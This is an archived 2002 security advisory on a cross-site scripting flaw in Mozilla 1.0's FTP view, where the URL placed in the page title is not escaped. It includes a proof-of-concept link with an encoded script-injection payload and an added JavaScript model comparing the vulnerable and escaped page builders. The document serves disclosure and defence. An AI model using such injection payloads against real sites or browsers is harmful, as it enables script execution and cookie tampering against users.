
Mozilla allows running Malicious Scripts due to a bug in 'FTP view'
6th Aug 2002 [SBWID-5605]
COMMAND

	Mozilla allows running Malicious Scripts due to a bug in 'FTP view'

SYSTEMS AFFECTED

	Mozilla 1.0

PROBLEM

	Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp] says:

	Mozilla allows running Malicious Scripts due to a bug in 'FTP view'. If
	you click on a malicious link, the script embedded in the URL will run.

	* If the FTP server and the HTTP server are the same address, it is
	  dangerous, because the cookie may be modified by the attacker.

	 + Details:
	 ~~~~~~~~~~~

	This problem is in 'FTP view'. The '<title>URL</title>' is not
	escaped.

	 + Exploit code:
	 ~~~~~~~~~~~~~~~~~

	<a href="ftp://[FTPserver]/#%3C%2ftitle%3E%3Cscript%3Ealert(%22exploit%22);%3C%2fscript%3E">Exploit</a>

	Example:

	<a href="ftp://ftp.mozilla.org/#%3C%2ftitle%3E%3Cscript%3Ealert(%22exploit%22);%3C%2fscript%3E">Exploit</a>
	 + Demonstration:
	 ~~~~~~~~~~~~~~~~

	http://www.geocities.co.jp/SiliconValley/1667/advisory03e.html

SOLUTION

	Upgrade to Mozilla 1.1 Beta, or disable JavaScript until you can.
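	The following is an added example, not code from the advisory or from
	Mozilla. It models the bug in a few lines of JavaScript: a toy "FTP view"
	page generator that drops the percent-decoded URL into <title> unescaped
	(the vulnerable shape described above), next to the same generator with
	HTML escaping applied. The generator, the decoding helper and the check
	functions are hypothetical; the sample URL is the advisory's own link.

```javascript
// Added example (not Mozilla's code): a toy model of how an "FTP view"
// directory listing page is built, putting the requested URL into <title>.
// renderFtpViewUnsafe reproduces the unescaped-title bug the advisory
// describes; renderFtpViewSafe shows the fix (escape before interpolating).

// Constructed sample: the advisory's proof-of-concept link. The fragment
// percent-decodes to  </title><script>alert("exploit");</script>
const EXPLOIT_URL =
  'ftp://ftp.mozilla.org/#%3C%2ftitle%3E%3Cscript%3Ealert(%22exploit%22);%3C%2fscript%3E';

// Hypothetical helper modelling the step where the listing page shows the
// decoded form of the URL (a real client has its own rules for the fragment).
function decodeFtpUrl(url) {
  return decodeURIComponent(url);
}

// Vulnerable: the decoded URL is written straight into title text, so a
// "</title>" inside it closes the element and everything after it is parsed
// as markup, including a <script> element.
function renderFtpViewUnsafe(url) {
  const shown = decodeFtpUrl(url);
  return '<html><head><title>' + shown + '</title></head>' +
         '<body><h1>Index of ' + shown + '</h1></body></html>';
}

// Escape the characters that can change HTML parsing context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: identical page, but the URL is escaped everywhere it lands in markup.
function renderFtpViewSafe(url) {
  const shown = escapeHtml(decodeFtpUrl(url));
  return '<html><head><title>' + shown + '</title></head>' +
         '<body><h1>Index of ' + shown + '</h1></body></html>';
}

// Model of how the parser reads <title>: everything up to the first "</title>"
// is title text; whatever follows is parsed as ordinary markup.
function parsedTitle(html) {
  const m = /<title>([\s\S]*?)<\/title>/i.exec(html);
  return m ? m[1] : null;
}

// Does the generated page contain a <script> element at all? A correctly
// escaped page never does, because every '<' from the URL became '&lt;'.
function containsInjectedScript(html) {
  return /<script[\s>]/i.test(html);
}

// Stand-alone demonstration.
console.log('unsafe title :', parsedTitle(renderFtpViewUnsafe(EXPLOIT_URL)));
console.log('unsafe script:', containsInjectedScript(renderFtpViewUnsafe(EXPLOIT_URL)));
console.log('safe title   :', parsedTitle(renderFtpViewSafe(EXPLOIT_URL)));
console.log('safe script  :', containsInjectedScript(renderFtpViewSafe(EXPLOIT_URL)));
```

	In the unsafe output the title is cut short at "ftp://ftp.mozilla.org/#"
	and the injected <script> element is live; in the safe output the whole
	decoded URL survives as title text and no <script> element exists. The
	escaping must be applied at the point where the string enters markup, not
	only at the URL bar: the URL is attacker-controlled data the moment it
	arrives in a clicked link.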
